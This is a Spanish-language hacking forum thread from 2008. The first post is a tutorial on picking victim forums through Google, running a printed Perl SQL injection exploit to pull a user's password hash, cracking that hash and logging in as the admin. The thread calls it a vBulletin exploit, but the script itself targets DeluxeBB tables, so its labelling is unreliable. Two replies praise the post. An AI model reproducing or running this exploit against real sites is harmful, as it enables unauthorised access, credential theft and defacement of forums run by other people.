PortalÍndiceCalendarioFAQRegistrarseConectarse

Comparte | 
 

 Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
XR00TX_H4CK17
FSB 166mhz
FSB 166mhz


Cantidad de envíos : 10
Edad : 26
Ubicación : C05T4 R1C4
Fecha de inscripción : 20/06/2008

MensajeTema: Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit   Vie Jun 20, 2008 9:09 pm

...::::BY::::...
||||||XR00TX_H4CK17||||||


Hola saludos a todos los user's del foro jeje soy nuevo en el foro como pueden ver jeje tmbien ya estoy en otros de hacking tambien pero me gusta mucho ingresar a los nuevos
y aportar de mis conocimientos en esto del hack1ng jeje bueno aca se los dejo.

Bueno saludos este manual esta 100% hecho x mi ahi lo digo por si las dudas de q hubo violacion de derechos de autor jajaja bueno la tecnica q hoy les voy a explicar es mas q todo para q vean como sirve un Exploit de SQL Inyecion remoto a foros Vbulletin masomenos como se ejecuta y de q trata jeje.

Segun wikipedia una: SQL Inyection es:

Inyección SQL es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro.

Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos.

La inyección SQL es un problema de seguridad informática que debe ser tomado en cuenta por el programador para prevenirlo. Un programa hecho con descuido, displicencia, o con ignorancia sobre el problema, podrá ser vulnerable y la seguridad del sistema puede quedar ciertamente comprometida. Esto puede suceder tanto en programas corriendo en computadores de escritorio, como en páginas Web, ya que éstas pueden funcionar mediante programas ejecutándose en el servidor que las aloja.

La vulnerabilidad puede ocurrir cuando un programa "arma" descuidadamente una sentencia SQL, con parámetros dados por el usuario, para luego hacer una consulta a una base de datos. Dentro de los parámetros dados por el usuario podría venir el código SQL inyectado.

Al ejecutarse esa consulta por la base de datos, el código SQL inyectado también se ejecutará y podría hacer un sinnúmero de cosas, como insertar registros, modificar o eliminar datos, autorizar accesos e, incluso, ejecutar código malicioso en el computador




EL exploit esta basado en perl.

OK empieso.

Primero q todo nos vamos a buscar nuestra victima para eso ya y como saben usaremos a www.papigoogle.com jaja.

Vamos a google y como muestra la siguiente imagen ponemos lo siguiente:







Ahora ya q nos dio varios resultados la busqueda sera buscar nuestra victima con tiempo y paciencia jeje solo es d eir probando y tener suerte juojo.
Ver imagen:




Ya que tengamos nuestra victima como vimos tenemos bastante de donde escoger.

Yo ya tengo la mia jeje como muestra la imagen:




ahora lo q haremos ya que tengamos eso listo va hacer el gran paso jeje compilar el exploit el exploit es el siguiente:

Código:
#!/usr/bin/perl

use IO::Socket;


print q{
######################################################
#  DeluxeBB  Remote SQL Injection Exploit          #
#  vbulletin Remote SQL Injection Exploit          #
#      //  SekoMirza // Turkish Hackerz              #
######################################################
};

if (!$ARGV[2]) {

print q{
   Usage: perl dbbxpl.pl host /directory/ victim_userid
 
      perl dbbxpl.pl www.somesite.com /forum/ 1


};

}


$server = $ARGV[0];
$dir    = $ARGV[1];
$user  = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid  = $ARGV[5];

print
"------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>]    DIR: $dir\r\n";
print "[>] USERID: $user\r\n";
print
"------------------------------------------------------------------------------------------------\r\n\r\n";

$server =~ s/(http:\/\/)//eg;

$path  = $dir;
$path .=

"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%

20WHERE%20(uid='".$user ;

 
print "[~] PREPARE TO CONNECT...\r\n";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr
=> "$server", PeerPort => "80") || die "[-]
CONNECTION FAILED";

print "[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";



print "--[ REPORT
]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{

 if ($answer =~/(\w{32})/)
{

  if ($1 ne 0) {
  print "Password Hash is: ".$2."\r\n";
print
"--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print
"------------------------------------------------------------------------------------------------\r\n";

#########################################################
#Shoutz:                                                #
#                       #
# My Sweet -> Caramel                #
# For Mp3s -> Hypn0sis               #
# For Support -> [WwW.StarHack.Org]         #
# My Bro -> PhantomOrchid            #
# My Preceptor -> Earnk Kazno             #
#########################################################
COMO VEmos el exploit empiesa asi:

Esto quiere decir q es basado en perl .

Ahora lo q haremos es abrir un bloc de notas y copiar todo el exploit tal y como esta y pegarlo.

Ahora lo q haremos sera irnos a archivo-guardar como... y lo guardamos con el nombre q queramos siempre y cuando poniendo la extension .pl q hace referencia al lenguaje en el q esta programado y poder ser ejecutado bien con el active perl y donde dice TIPO: seleccionamos la opcion Todos los archivos
Ver Imagen:




lISTO YA lo tenemos guardado: jeje Wink



AHORa vamos a ejecutarlo para eso nos vamos a:
Inicio-ejecutar-y ponemos: cmd o command cualquiera de esos dos jeje.



Ahora lo q hacemos es ingresar hasta donde tenemos el exploit guardado en mi caso yo lo dje en el escritorio para esto usariamos el comando : cd Q ES para ingresar a un directorio/carpeta.



Ahora ya q estamos ahi ejecutamos el activeperl desde ahi y indicandole q ejecute nuestro exploit seria asi: perl exploit.pl ojo recuerden poner bien el nombre del exploit a como lo guardaron + la extension jeje.



Ahi esta listo ya tenemos el exploit abierto vemos muy bien que nos indica cmo hacer uso de el nos dice q seria asi: perl exploit.pl + el host o la web q queremos atacar + /forum/ 1



Listo y quedaria algo como asi:




Ahora lo q quedaria seria desencriptar el hash de MD5 ya sea con algun programa o con una web online de hash cracker yo la q uso es http://www.milw0rm.com/
y arriba de la pag donde dice cracker.

Y listo ya ahora seria solo averiguar el nombre del admin del foro e ingresar ya con el password desencriptado y como lo averiguamos? jaja facil nos vamos al foro y buscamos entre los posts casi siempre en el nombre de usuario nos dice si es user nuevo o q o si es el admin jaja como muestra la imagen:





Y listo espero les ahya servido y entendido mas q tdo es para q vean en q consiste un exploit de inyeccion sql remota para asi obtener el hash del admin y loguearnos.
Vbulletin casi q todos los foros de ellos no presentan este bug pero solo es d ebuscar bien jeje.


S41UDO5.....Wink =P
Volver arriba Ir abajo
Ver perfil de usuario
anonymussr
FSB 166mhz
FSB 166mhz
avatar

Cantidad de envíos : 35
Fecha de inscripción : 12/04/2008

MensajeTema: Re: Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit   Mar Jun 24, 2008 10:15 pm

:O bug v Bulletin ya avia posteado eso yo -.- Razz xD mui bueno esta mejor q mi tutorial xD bienvido al foro
Volver arriba Ir abajo
Ver perfil de usuario
Shadow
Administrador
Administrador
avatar

Cantidad de envíos : 408
Edad : 32
Ubicación : Gualeguaychu
Fecha de inscripción : 10/04/2008

MensajeTema: Re: Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit   Jue Jun 26, 2008 7:09 pm

bueno puedo decir.... me ha salido linda la seccion.... no se ha llenado de "zerocool" la seccion.... ni ningun paja pidiendo la pass del correo de la novia ^^... bueno.... lei una nota sobre seguridad q me hiso desistir de mi idea de manejarme solo en esto... asi q nuevamente sin animo de hacer un TEAM si me voy a unir a un par mas para trabajar sobre la seguridad informatica.... vienvenido anonymus.... ya veremos quien mas me sale bueno...

linda nota ^^ me mata los usewr q se toman todo el trabajo de ponerle las imagenes... la verdad muy bueno ||||||XR00TX_H4CK17|||||| dsp te agrego al msn.... pense q eras conocido de anonymus y q eras de aca, de argentina, pero veo q poco a poco estamos llegando un poquito mas lejos te invito a que vallas a la seccion de Sistemas Operativos... hay una propuesta de crear un SO orientado a hackers.... por el momento estoy hasta las bolas con la facultad y con una capacitacion q quiero obtener, pero como el examen esta en ingles y son 245 preguntas estoy con los tiempos justos... pero en las bacaciones veremos hasta adonde adelantamos en eso....


Saludos.... y vienvenido al foro


PD: saludos a la gente de HACKER WORLD

_________________
Un jugador que hace un buen equipo es mucho mejor que un gran jugador.
Perdiéndose en el grupo por el bien de todos…Eso es trabajo en equipo...
Recoger datos es solo el primer paso a la sabiduría pero…
Compartir datos es el primer paso hacia la comunidad.
Amplificación del conocimiento, lo que aprende uno, lo prendemos todos
Una pequeña persona puede resolver un problema muy complejo…Todo esta en la sincronización
Volver arriba Ir abajo
Ver perfil de usuario http://www.fotolog.com/shadowsecurity
Contenido patrocinado




MensajeTema: Re: Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit   

Volver arriba Ir abajo
 
Defaceando a Vbulletin 3.5 y 3.6Remote SQl Inyection-Exploit
Ver el tema anterior Ver el tema siguiente Volver arriba 
Página 1 de 1.
 Temas similares
-
» clinica de manejo y rescate 4x4 domingo 23 de mayo
» problema electrico con vocho full inyection
» Cambio de Inyeccion a Carburador (ojo solo por necesidad)
» vocho fuel inyection accelerado
» Volver el auto de carburador a Inyection ( motor 1.6 )

Permisos de este foro:No puedes responder a temas en este foro.
BrokeN ShadoW Foro Informático :: Seguridad Informática :: Seguridad Informática :: Hack-
Cambiar a: